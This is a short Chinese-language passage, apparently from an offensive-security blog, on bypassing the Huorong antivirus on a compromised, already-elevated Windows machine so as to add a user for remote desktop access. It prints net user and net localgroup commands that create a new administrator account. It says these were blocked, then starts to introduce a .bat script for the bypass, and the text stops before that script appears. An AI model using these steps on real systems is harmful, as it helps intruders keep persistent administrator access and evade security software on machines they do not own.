目录
背景
绕过火绒
背景
1. 已攻入windows系统
2. 已提权
3. 准备添加一个用户进行远程桌面
4. 该windows系统存在火绒
绕过火绒
1. 尝试添加用户远程连接
net user newuser password123 /add
net localgroup administrators newuser /add
但添加用户时又回显超时,想起来应该是有杀软在拦截命令行添加用户。一看果不其然,有火绒。
2. 使用如下方法绕过火绒添加用户。我们可以编写一个.bat命令批处理脚本,内容如下: